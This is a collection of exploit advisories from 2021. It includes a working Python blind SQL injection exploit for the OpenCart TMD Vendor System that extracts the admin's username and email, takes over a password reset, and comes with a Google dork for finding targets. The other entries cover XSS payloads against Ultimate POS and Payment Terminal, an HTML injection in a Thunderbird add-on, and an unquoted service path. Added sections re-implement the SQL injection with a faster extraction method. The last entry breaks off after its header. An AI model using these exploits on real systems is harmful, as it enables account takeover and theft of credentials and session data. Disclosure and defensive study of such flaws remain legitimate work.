Cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdFQ2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D
_method=PUT&_token=null&name=test_products"><iframe src=evol.source onload=alert(document.cookie)></iframe>&sku=2&barcode_type=C128&unit_id=1&brand_id=&category_id=&sub_category_id=&product_locations[]=1&enable_stock=1&alert_quantity=2.00&product_description=&image=&product_brochure=&weight=4&product_custom_field1=3&product_custom_field2=5&product_custom_field3=1&product_custom_field4=2
&woocommerce_disable_sync=0&tax=&tax_type=exclusive&single_variation_id=204&single_dpp=1.00&single_dpp_inc_tax=1.00
&profit_percent=0.00&single_dsp=1.00&single_dsp_inc_tax=1.00&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000/products
set-cookie: ultimate_pos_session=eyJpdiI6IlhwOTR3NmxwMmNvbWU0WlI3c3B6R1E9PSIsInZhbHVlIjoiWkV5XC80Uk53b3daaXM1V3pOYXp6ZzFTdEhnejVXcUdFQ2lkUFl4WTk4dXNhQ2plUnpxWmFjYzE0bTJLQnAyVXQiLCJtYWMiOiI1OTQxZGIzMDU1NzQyNDA1YTQ3N2YyZTdjMWYyZTg0NmE1MGU0YTQ2ODc0MTg4ZTlmNmIwYzljMTBmZGUwNzE0In0%3D; Max-Age=7200; path=/; httponly


Vulnerable Source: Products (list - name)

<tbody><tr data-href="https://pos-uf.localhost.com:8000/products/view/158" role="row" class="odd"><td class="selectable_td">
<input type="checkbox" class="row-select" value="158"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/img/default.png" alt="Product image" class="product-thumbnail-small"></div></td>
<td><div class="btn-group"><button type="button" class="btn btn-info dropdown-toggle btn-xs" data-toggle="dropdown" aria-expanded="false">
Actions<span class="caret"></span><span class="sr-only">Toggle Dropdown</span></button><ul class="dropdown-menu dropdown-menu-left" role="menu"><li>
<a href="https://pos-uf.localhost.com:8000/labels/show?product_id=158" data-toggle="tooltip" title="Print Barcode/Label"><i class="fa fa-barcode">
</i> Labels</a></li><li><a href="https://pos-uf.localhost.com:8000/products/view/158" class="view-product"><i class="fa fa-eye"></i> View</a></li>
<li><a href="https://pos-uf.localhost.com:8000/products/158/edit"><i class="glyphicon glyphicon-edit"></i> Edit</a></li><li>
<a href="https://pos-uf.localhost.com:8000/products/158" class="delete-product"><i class="fa fa-trash"></i> Delete</a></li><li class="divider">
</li><li><a href="#" data-href="https://pos-uf.localhost.com:8000/opening-stock/add/158" class="add-opening-stock"><i class="fa fa-database">
</i> Add or edit opening stock</a></li><li><a href="https://pos-uf.localhost.com:8000/products/stock-history/158"><i class="fas fa-history">
</i> Product stock history</a></li><li><a href="https://pos-uf.localhost.com:8000/products/create?d=158"><i class="fa fa-copy">
</i> Duplicate Product</a></li></ul></div></td><td class="sorting_1">aa"><iframe src="a" onload="alert(document.cookie)"></iframe>
<br><i class="fab fa-wordpress"></i></td><td>Awesome Shop</td><td><div style="white-space: nowrap;">$ 1.00 </div></td><td>
<div style="white-space: nowrap;">$ 1.25 </div></td><td> 0 Pieces</td><td>Single</td><td> </td><td></td><td></td><td>AS0158</td>
<td></td><td></td><td></td><td></td></tr><tr data-href="https://pos-uf.localhost.com:8000/products/view/17" role="row" class="even">
<td class="selectable_td"><input type="checkbox" class="row-select" value="17"></td><td><div style="display: flex;">
<img src="https://pos-uf.localhost.com:8000/uploads/img/1528727793_acerE15.jpg" alt="Product image" class="product-thumbnail-small"></div></td>


Reference(s):
https://pos-uf.localhost.com:8000/products/
https://pos-uf.localhost.com:8000/products/view/
https://pos-uf.localhost.com:8000/products/23/edit


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Restrict the input on product names to disallow special chars
2. Encode and filter the input transmitted via POST in the name parameter
3. Escape and sanitize the output in the products listing of the backend


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
-
Opencart 3 Extension TMD Vendor System - Blind SQL Injection
# Exploit Title: Opencart 3 Extension TMD Vendor System - Blind SQL Injection
# Author: Muhammad Zaki Sulistya (zaki.sulistya@gmail.com)
# Date: 03-11-2021
# Product: TMD Vendor System
# Vendor Homepage: https://www.opencartextensions.in/
# Software Link: https://www.opencartextensions.in/opencart-multi-vendor-multi-seller-marketplace
# Version: TMD Vendor System 3.x
# Tested on: MacOS
# Google Dork: inurl:index.php?route=vendor/allseller
# Info: Patched on the new version

#!/usr/bin/env python3
import time
from random import randint

import requests
from bs4 import BeautifulSoup


class TmdSqli:
    def __init__(self, url):
        # Characters tried for every extracted position; the set covers what
        # usernames and e-mail addresses of OpenCart admin accounts normally contain
        self.char_list = ['.', ':', '@', '-', '_', '+'] \
            + [chr(c) for c in range(ord('a'), ord('z') + 1)] \
            + [chr(c) for c in range(ord('A'), ord('Z') + 1)] \
            + [chr(c) for c in range(ord('0'), ord('9') + 1)]
        self.url = url
        self.user_agents = []
        self.injection_true = None
        self.username = None
        self.email = None
        self.admin_page = None
        self.set_user_agent()
        self.is_vulnerable()

    def set_user_agent(self):
        # Load a public list of browser User-Agent strings; each request picks one at random
        if len(self.user_agents) == 0:
            r = requests.get('https://gist.githubusercontent.com/pzb/b4b6f57144aea7827ae4/raw/'
                             'cf847b76a142955b1410c8bcef3aabe221a63db1/user-agents.txt').text
            self.user_agents = [ua for ua in r.split("\n") if ua.strip()]

    def get_content(self, url):
        # Fetch the page and return its #content element. All boolean comparisons
        # below are made on this element only, so differences elsewhere on the page
        # (timestamps, session-bound markup) do not produce wrong answers.
        # On a connection error wait a minute and retry the same request.
        while True:
            try:
                headers = {'user-agent': self.user_agents[randint(0, len(self.user_agents) - 1)]}
                req = requests.get(url, headers=headers)
                soup = BeautifulSoup(req.content, 'html.parser')
                return soup.find(id='content')
            except requests.exceptions.ConnectionError as e:
                print("CONNECTION ERROR:", e)
                time.sleep(60)

    def is_vulnerable(self):
        # Boolean-based blind check: "AND 1=1" must leave the page unchanged,
        # "AND 1=0" must change it
        url_injection_true = self.url + "' AND 1=1--+-"
        url_injection_false = self.url + "' AND 1=0--+-"
        default_response = self.get_content(self.url)
        injection_true = self.get_content(url_injection_true)
        injection_false = self.get_content(url_injection_false)
        if default_response == injection_true and default_response != injection_false:
            print("The target is vulnerable")
            self.injection_true = injection_true
            row_length = self.user_data_length()
            self.dump_data(row_length)
        else:
            print("Not vulnerable")

    def user_data_length(self):
        # Length of "username:email" for the first row of oc_user (the admin user table)
        n = 1
        while True:
            request_url = self.url + "' AND (SELECT LENGTH(CONCAT(username,0x3a,email)) FROM oc_user LIMIT 0,1)=" + str(n) + "--+-"
            if self.get_content(request_url) == self.injection_true:
                print("Row length : " + str(n))
                return n
            n += 1

    def reset_code_length(self):
        # Length of the password reset code stored for the extracted user
        n = 1
        while True:
            request_url = self.url + "' AND (SELECT LENGTH(CONCAT(code)) FROM oc_user WHERE username = '" + self.username + "')=" + str(n) + "--+-"
            if self.get_content(request_url) == self.injection_true:
                print("Row length : " + str(n))
                return n
            n += 1

    def dump_data(self, length):
        # Extract "username:email" one character at a time by comparing ASCII codes
        data = ""
        for i in range(1, length + 1):
            for c in self.char_list:
                request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(username,0x3a,email), " + str(i) + ",1)) FROM oc_user LIMIT 0,1)=" + str(ord(c)) + "--+-"
                if self.get_content(request_url) == self.injection_true:
                    data += c
                    print("Get : " + data)
                    break
        user_data = data.split(":", 1)
        self.username = user_data[0]
        self.email = user_data[1]
        self.reset_password()

    def dump_reset_code(self, length):
        # Same character-by-character extraction, this time for the reset code
        data = ""
        for i in range(1, length + 1):
            for c in self.char_list:
                request_url = self.url + "' AND (SELECT ASCII(SUBSTRING(CONCAT(code), " + str(i) + ",1)) FROM oc_user WHERE username = '" + self.username + "')=" + str(ord(c)) + "--+-"
                if self.get_content(request_url) == self.injection_true:
                    data += c
                    print("Get : " + data)
                    break
        return data

    def reset_password(self):
        # Ask OpenCart to generate a reset code for the admin's e-mail address, then
        # read that code back through the injection and build the reset link
        self.admin_page = input("Admin page URL : ")
        request_url = self.admin_page + '/index.php?route=common/forgotten'
        post_data = {'email': self.email}
        req = requests.post(request_url, data=post_data)
        if req.status_code == 200:
            row_length = self.reset_code_length()
            reset_code = self.dump_reset_code(row_length)
            reset_password_url = self.admin_page + '/index.php?route=common/reset&code=' + reset_code
            print("Gotcha!")
            print("username : " + self.username)
            print("You can reset the password : " + reset_password_url)


if __name__ == '__main__':
    print("TARGET URL ex: https://[redacted]/index.php?route=product/product&product_id=[product_id]")
    target = input("Target URL : ")
    TmdSqli(target)
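The exploit above is a boolean-based blind injection: a condition that is true reproduces the normal product page, a false one changes it, and each such yes/no question leaks one fact about the database. The following is an added example, not part of the original exploit, that reproduces the technique offline against a constructed SQLite stand-in for the vulnerable query. The table layout, the sample admin row and the `1' AND ... -- -` injection point are assumptions made for the demo, and SQLite's `length()`, `substr()`, `unicode()` and `||` stand in for MySQL's `LENGTH()`, `SUBSTRING()`, `ASCII()` and `CONCAT()`. It goes beyond the exploit in one respect: it binary-searches the length and each character's code instead of trying every character of a list, which brings the cost down from up to about sixty requests per character to seven.

```python
import sqlite3

# Constructed sample row standing in for OpenCart's oc_user table (not real data).
SAMPLE_USERS = [("admin", "admin@example.test", "reset-code-0001")]


class VulnerableApp:
    """Hypothetical stand-in for the vulnerable extension: the product_id
    parameter is concatenated straight into the SQL text (SQLite here so the
    example runs offline)."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE oc_product (product_id TEXT, name TEXT)")
        self.db.execute("CREATE TABLE oc_user (username TEXT, email TEXT, code TEXT)")
        self.db.execute("INSERT INTO oc_product VALUES ('1', 'Widget')")
        self.db.executemany("INSERT INTO oc_user VALUES (?, ?, ?)", SAMPLE_USERS)
        self.requests = 0  # counts simulated HTTP requests so the cost of extraction is visible

    def page(self, product_id):
        self.requests += 1
        sql = "SELECT name FROM oc_product WHERE product_id = '%s'" % product_id  # unsafe on purpose
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error:
            row = None
        return "<div id=\"content\">%s</div>" % (row[0] if row else "Product not found!")


class BlindExtractor:
    """Boolean-based blind extraction: every query becomes a yes/no question
    whose answer is 'did the page look like the TRUE page?'."""

    def __init__(self, app, product_id="1"):
        self.app = app
        self.base = product_id
        self.true_page = app.page(self.base + "' AND 1=1-- -")
        false_page = app.page(self.base + "' AND 1=0-- -")
        # Same sanity check the exploit performs before extracting anything
        if self.true_page != app.page(self.base) or self.true_page == false_page:
            raise RuntimeError("target does not behave like a boolean blind injection")

    def ask(self, condition):
        return self.app.page(self.base + "' AND (" + condition + ")-- -") == self.true_page

    def _search(self, greater_than, hi):
        # Binary search for the value x in [0, hi] using only "x > v" questions
        lo = 0
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(greater_than(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def length(self, expr, limit=256):
        return self._search(
            lambda v: "(SELECT length(%s) FROM oc_user LIMIT 1) > %d" % (expr, v), limit)

    def char_at(self, expr, pos):
        # 7-bit ASCII assumed; widen the bound for non-ASCII data
        code = self._search(
            lambda v: "(SELECT unicode(substr(%s, %d, 1)) FROM oc_user LIMIT 1) > %d" % (expr, pos, v), 127)
        return chr(code)

    def extract(self, expr):
        n = self.length(expr)
        return "".join(self.char_at(expr, i) for i in range(1, n + 1))


def demo():
    """Extract 'username:email' of the first oc_user row; returns (value, requests used)."""
    app = VulnerableApp()
    data = BlindExtractor(app).extract("username || ':' || email")
    return data, app.requests


if __name__ == "__main__":
    value, cost = demo()
    print("%s  (%d requests)" % (value, cost))
```

The length search costs 8 requests and each of the 24 characters 7, so the whole row is recovered in well under 200 requests; the same `_search` helper works for the reset code by changing the expression and adding a `WHERE username = ...` clause, exactly as the exploit does.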
-
Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
# Exploit Title: Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.criticalgears.com/
# Software Link: https://www.criticalgears.com/product/authorize-net-payment-terminal/
#                https://www.criticalgears.com/product/paypal-pro-payment-terminal/
#                https://www.criticalgears.com/product/stripe-payment-terminal/
# Version: 2.4.1, 2.2.1 & 3.1
# Tested on: Linux (Apache)

Document Title:
===============
Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2280


Release Date:
=============
2021-11-05


Vulnerability Laboratory ID (VL-ID):
====================================
2280


Common Vulnerability Scoring System:
====================================
5.2


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Quick and easy payment terminal script for clients to pay for products and services.

(Copy of the Homepage: https://www.criticalgears.com/product/authorize-net-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/paypal-pro-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/stripe-payment-terminal/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1.


Affected Product(s):
====================
CriticalGears
Product: Authorize.net Payment Terminal 2.4.1 - Payment Form Script (PHP) (Web-Application)
Product: Stripe Payment Terminal v2.2.1 - Payment Form Script (PHP) (Web-Application)
Product: PayPal PRO Payment Terminal v3.1 - Payment Form Script (PHP) (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official Authorize.net Payment Terminal v2.4.1, the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise client-side browser-to-web-application requests.

The non-persistent cross site scripting web vulnerabilities are located in the `item_description`, `fname`, `lname`, `address`, `city` and `email` parameters of the `Billing Information` and `Payment Information` form. Attackers are able to inject their own malicious script code into the `Description`, `Firstname`, `Lastname`, `Address`, `City` and `Email` input fields to manipulate client-side requests. The request method to inject is POST and the attack vector is non-persistent on the client side. Where the form is embedded in another web service, attackers are able to exploit the bug by triggering execution of the script code in the invalid-input exception handling. The PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1 ship the same vulnerable script and are affected by the same validation vulnerability as well.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Billing Information
[+] Payment Information

Vulnerable Input(s):
[+] Description
[+] Firstname
[+] Lastname
[+] Address
[+] City
[+] Email

Vulnerable Parameter(s):
[+] item_description
[+] fname
[+] lname
[+] address
[+] city
[+] email

Affected Module(s):
[+] Exception Handling (Invalid)


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
">%20<iframe src=evil.source onload=alert(document.domain)>%20</iframe>
">%20<iframe src=evil.source onload=alert(document.cookie)>%20</iframe>


Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack)

<div id="accordion">
<!-- PAYMENT BLOCK -->
<h2 class="current">Payment Information</h2>
<div class="pane" style="display:block">
<label>Description:</label>
<input name="item_description" id="item_description" type="text" class="long-field" value=""> <iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);"
<div class="clr"></div>
<label>Amount:</label>
<input name="amount" id="amount" type="text" class="small-field" value="1.00" onkeyup="checkFieldBack(this);noAlpha(this);" onkeypress="noAlpha(this);">
<div class="clr"></div>
</div>
<!-- PAYMENT BLOCK -->
-
<!-- BILLING BLOCK -->
<h2>Billing Information</h2>
<div class="pane">
<label>First Name:</label>
<input name="fname" id="fname" type="text" class="long-field" value="">"><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Last Name:</label>
<input name="lname" id="lname" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Address:</label>
<input name="address" id="address" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>City:</label>
<input name="city" id="city" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>


--- PoC Session Logs (POST) ---
https://autherminal.localhost:8080/authorize-terminal/
Host: autherminal.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125
Content-Length: 3270
Origin: https://autherminal.localhost:8080
Connection: keep-alive
Referer: https://autherminal.localhost:8080/authorize-terminal/
Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c
item_description="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&amount=1&fname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&lname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&address="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&city="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&country=US&state=-AU-NSW&zip=2411
&email="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123
&g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF
&submit.x=50&submit.y=14&process=yes
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=utf-8
vary: Accept-Encoding


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the input in combination with parsing or escaping of the content. After that the onkeyup checkFieldBack handler should be sanitized correctly to prevent script code execution for clients.


Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
-
10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage: https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

srvInventoryWebServer  srvInventoryWebServer  C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe  Auto

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
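An added example, not part of the original advisory: the check a practitioner would script rather than eyeball. It parses `sc qc` output of the form shown above, decides whether the image path is unquoted and contains spaces, and lists the files Windows will look for before the real binary (for an unquoted path, CreateProcess tries the text up to each space with `.exe` appended). Each of those locations is a planting spot for a local user who can write there, and because the service starts as LocalSystem a planted binary runs with that account. The caveat that decides exploitability is the directory ACLs: on a default install `C:\` and `C:\Program Files (x86)\` are not writable by standard users, so each candidate directory still has to be checked with `icacls`, which this script does not simulate. The `sc qc` text embedded below is the advisory's own output; the quoted service in the usage note is made up for contrast.

```python
# The advisory's own `sc qc srvInventoryWebServer` output, embedded as sample input.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc <name>` output into a dict of FIELD -> value (only the
    upper-case field lines are kept; the [SC] status line has no colon)."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().isupper():
            fields[key.strip()] = value.strip()
    return fields


def executable_part(binary_path):
    """Image path without arguments: a quoted path ends at the closing quote,
    an unquoted one is taken up to and including the first '.exe'."""
    p = binary_path.strip()
    if p.startswith('"'):
        return p[1:p.index('"', 1)] if '"' in p[1:] else p[1:]
    idx = p.lower().find(".exe")
    return p[: idx + 4] if idx != -1 else p


def is_unquoted_with_spaces(binary_path):
    p = binary_path.strip()
    return not p.startswith('"') and " " in executable_part(p)


def hijack_candidates(binary_path):
    """Files Windows tries before the real image when the path is unquoted:
    the text up to each space, with '.exe' appended (CreateProcess semantics)."""
    if not is_unquoted_with_spaces(binary_path):
        return []
    parts = executable_part(binary_path).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_service(sc_qc_text):
    """Summarise one service: name, account it runs as, whether the path is
    unquoted, and the candidate plant locations to check with icacls."""
    f = parse_sc_qc(sc_qc_text)
    path = f.get("BINARY_PATH_NAME", "")
    return {
        "name": f.get("SERVICE_NAME"),
        "account": f.get("SERVICE_START_NAME"),
        "unquoted": is_unquoted_with_spaces(path),
        "candidates": hijack_candidates(path),
    }


if __name__ == "__main__":
    report = audit_service(SC_QC_OUTPUT)
    print("%s runs as %s, unquoted path: %s" % (report["name"], report["account"], report["unquoted"]))
    for c in report["candidates"]:
        print("  would be tried first:", c)
```

For the advisory's service this yields six candidates, starting with `C:\Program.exe` and `C:\Program Files.exe`; a properly quoted path such as `"C:\Program Files\Vendor\svc.exe" -k` (made up here) produces none. The same functions can be fed the output of `sc qc` for every service listed by the `wmic` one-liner above.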
-
ImportExportTools NG 10.0.4 - HTML Injection
# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://github.com/thundernest/import-export-tools-ng
# Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/
# Version: 10.0.4
# Tested on: Windows

Document Title:
===============
ImportExportTools NG 10.0.4 - HTML Injection Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2308


Release Date:
=============
2021-11-05


Vulnerability Laboratory ID (VL-ID):
====================================
2308


Common Vulnerability Scoring System:
====================================
4.2


Vulnerability Class:
====================
Script Code Injection


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Adds tools to import/export messages and folders (NextGen).

(Copy of the Homepage: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 add-on for Mozilla Thunderbird.


Affected Product(s):
====================
Christopher Leidigh
Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)


Vulnerability Disclosure Timeline:
==================================
2021-10-07: Researcher Notification & Coordination (Security Researcher)
2021-10-08: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
An HTML injection vulnerability has been discovered in the official ImportExportTools NG 10.0.4 add-on for Mozilla Thunderbird. The vulnerability allows a remote attacker to inject HTML payloads to compromise application data or session credentials.

The vulnerability is located in the HTML export function: the message subject is written into the export without sanitization, unlike in Mozilla's own exports. This allows a remote attacker to send a malicious email with a malformed HTML payload in the subject that executes when the victim previews the file after exporting the folder to HTML.

Vulnerable Module(s):
[+] Export (HTML)


Proof of Concept (PoC):
=======================
The web vulnerability can be exploited by remote attackers without a user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install Mozilla Thunderbird
2. Install ImportExportTools NG v10.0.4
3.
Use another email to write to the target inbox were the export takes place Note: Inject into the subject any html test payload 4. Target user exports his content of the inbox in html were the payload executes 5. Successful reproduce of the encode validation vulnerability! Note: We reported some years ago the same issue that was also present in keepass and kaspersky password manager on exports via html and has been successfully resolved. Vulnerable Source: ImportExportTools Exported HTML File <html><head> <style> table { border-collapse: collapse; } th { background-color: #e6ffff; } th, td { padding: 4px; text-align: left; vertical-align: center; } tr:nth-child(even) { background-color: #f0f0f0; } tr:nth-child(odd) { background-color: #fff; } tr>:nth-child(5) { text-align: center; } </style> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Posteingang</title> </head> <body> <h2>Posteingang (10/07/2021)</h2><table width="99%" border="1"><tbody><tr><th><b>Betreff</b></th> <th><b>Von</b></th><th><b>An</b></th><th><b>Datum</b></th><th><b>Anhang</b></th></tr> <tr><td><a href="Nachrichten/20211007-payload%20in%20subject%20___iframe%20src%3Devil.source%20onload%3Dalert(document.domain)_-151.html"> payload in subject "><iframe src="evil.source" onlo<="" a=""></td> <td>test@vulnerability-lab.com" <test@vulnerability-</td> <td>user@test-service.de</td> <td nowrap>10/07/2021</td> <td align="center">* </td></tr> Reference(s): https://addons.thunderbird.net/de/thunderbird/addon/importexporttools-ng/ Solution - Fix & Patch: ======================= The output that is visible in the subject needs to be encoded and secure sanitized to prevent an execute from any listed value. Restrict the execution via import/export with special chars to prevent further attacks. 
Credits & Authors:
==================
Vulnerability-Lab [admin@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
-
Simple Client Management System 1.0 - SQLi (Authentication Bypass)
# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass)
# Exploit Author: Sentinal920
# Date: 5-11-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: Login
# Vulnerable Parameter: "password"

Technical description:
